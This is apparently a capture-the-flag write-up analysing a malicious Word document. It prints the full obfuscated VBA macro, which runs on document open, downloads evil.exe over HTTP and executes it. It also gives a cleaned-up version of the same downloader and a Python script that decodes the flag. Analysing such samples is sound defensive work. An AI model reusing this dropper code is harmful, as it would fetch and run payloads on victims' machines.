When we open the document, we see this image that is commonly found in a lot of document malware. We also have a prompt on top to enable macros.

If we enable macros and have a tool like FakeNet running, then we get the following output:

This looks interesting, it is trying to download an evil.exe from an RFC 1918 internal IP address 10.1.133.7. We can look at the macros using the macro viewer in Word or by dumping them with a tool like olevba from decalge.

Private Function QklkhFEQNB(HGKuttPaRM As Variant, UBvkWqzieX As Integer)
Dim gsFEVmmIzO, vSHOfSrEta As String, dHLdiEqdts, eUTAbMoUIA
vSHOfSrEta = ActiveDocument.Variables("ppKzr").Value()
gsFEVmmIzO = ""
dHLdiEqdts = 1
While dHLdiEqdts < UBound(HGKuttPaRM) + 2
eUTAbMoUIA = dHLdiEqdts Mod Len(vSHOfSrEta): If eUTAbMoUIA = 0 Then eUTAbMoUIA = Len(vSHOfSrEta)
gsFEVmmIzO = gsFEVmmIzO + Chr(Asc(Mid(vSHOfSrEta, eUTAbMoUIA + UBvkWqzieX, 1)) Xor CInt(HGKuttPaRM(dHLdiEqdts - 1)))
dHLdiEqdts = dHLdiEqdts + 1
Wend
QklkhFEQNB = gsFEVmmIzO
End Function
Public Function BkAIuNwQNDkohBY()
twOvwCSTPL = QklkhFEQNB(Array(5, 5, 27, 65, 89, 98, 85, 86, 71, 75, 66, 92, 95, 98, 67, 64, 89, 83, 84, 95, 26, _
78, 116, 78, 91, 5, 116, 32, 72, 2, 33, 48, 10, 29, 61, 8, 37, 20, 63, 44, 1, _
12, 62, 38, 47, 52, 99, 57, 5, 121, 89, 37, 65, 32, 32, 11, 98, 42, 58, 32, 28, _
9, 3, 117, 85, 4, 57, 10, 94, 0, 16, 8, 28, 42, 30, 121, 71, 6, 8, 9, 37, _
2, 23, 34, 21, 120, 54, 7, 40, 35, 75, 50, 87, 3, 55, 47, 99, 52, 13, 0, 42, _
30, 27, 126, 59, 3, 123, 29, 52, 44, 53, 29, 15, 50, 12, 35, 8, 48, 89, 54, 27, _
62, 28, 8, 36, 49, 119, 104, 14, 5, 64, 34, 43, 22, 71, 5, 46, 7, 66, 42, 0, _
1, 113, 97, 83, 31, 45, 95, 111, 31, 40, 51), 24)
UkIWIEtqCF = QklkhFEQNB(Array(42, 115, 2), 188)
Dim xHttp: Set xHttp = CreateObject(QklkhFEQNB(Array(116, 7, 6, 74, 60, 43, 42, 36, 64, 70, 110, 27, 28, 12, 12, 17, 23), 0))
Dim bStrm: Set bStrm = CreateObject(QklkhFEQNB(Array(15, 32, 32, 53, 35, 89, 22, 25, 65, 53, 51, 26), 176))
xHttp.Open UkIWIEtqCF, twOvwCSTPL, False
xHttp.Send
With bStrm
.Type = 1
.Open
.write xHttp.responseBody
.savetofile QklkhFEQNB(Array(20, 39, 81, 118, 52, 78, 11), 17), 2
End With
Shell (QklkhFEQNB(Array(20, 39, 81, 118, 52, 78, 11), 17))
End Function
Private Sub Document_Open()
If ActiveDocument.Variables("ppKzr").Value <> "toto" Then
BkAIuNwQNDkohBY
ActiveDocument.Variables("ppKzr").Value = "toto"
If ActiveDocument.ReadOnly = False Then
ActiveDocument.Save
End If
End If
End Sub

As we can see, this code has its strings encoded and is obfuscated, and when we clean it up, it’s pretty simple:

Public Function Beacon()
x = "http://10.1.33.7/b64/x58/MDgxOTE2MjMwZTMxMDIzMTNhNjk2YjA3NjgzNjM0MjE2YTJjMzA2ODJiNmIwNzBmMzA2ODA3MTMz\nNjY4MmYwNzJmMzA2YjJhNmI2YTM0Njg2ODMzMjU=/evil.exe"
y = "GET"
Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open y, x, False
xHttp.Send
With bStrm
    .Type = 1
        .Open
            .write xHttp.responseBody
                .savetofile "bad.exe", 2
                End With
                Shell ("bad.exe")
                End Function

Now we can see this matches what we saw in FakeNet. It looks like the URL that it’s looking up is in base64. If we decode it, we get:

>>> base64.b64decode("MDgxOTE2MjMwZTMxMDIzMTNhNjk2YjA3NjgzNjM0MjE2YTJjMzA2ODJiNmIwNzBmMzA2ODA3MTMz\nNjY4MmYwNzJmMzA2YjJhNmI2YTM0Njg2ODMzMjU=")
'081916230e3102313a696b07683634216a2c30682b6b070f3068071336682f072f306b2a6b6a3468683325'

This looks like an ascii hex string, but if we convert it to bytes, we don’t get anything interesting. However, the URI also includes another single byte (we assume since it starts with x) of x58. If we try decoding the hex string with that byte, we get the key. Here is an example Python script to print the key from the URI.

a = “”
s = "MDgxOTE2MjMwZTMxMDIzMTNhNjk2YjA3NjgzNjM0MjE2YTJjMzA2ODJiNmIwNzBmMzA2ODA3MTMz\nNjY4MmYwNzJmMzA2YjJhNmI2YTM0Njg2ODMzMjU=".decode('base64')
for i, x in zip(s[0::2], s[1::2]):
          a+=chr(int(str(i+x), 16)^0x58)
print a

PAN{ViZib13_0nly2th0s3_Wh0_Kn0w_wh3r32l00k}

PAN{ViZib13_0nly2th0s3_Wh0_Kn0w_wh3r32l00k}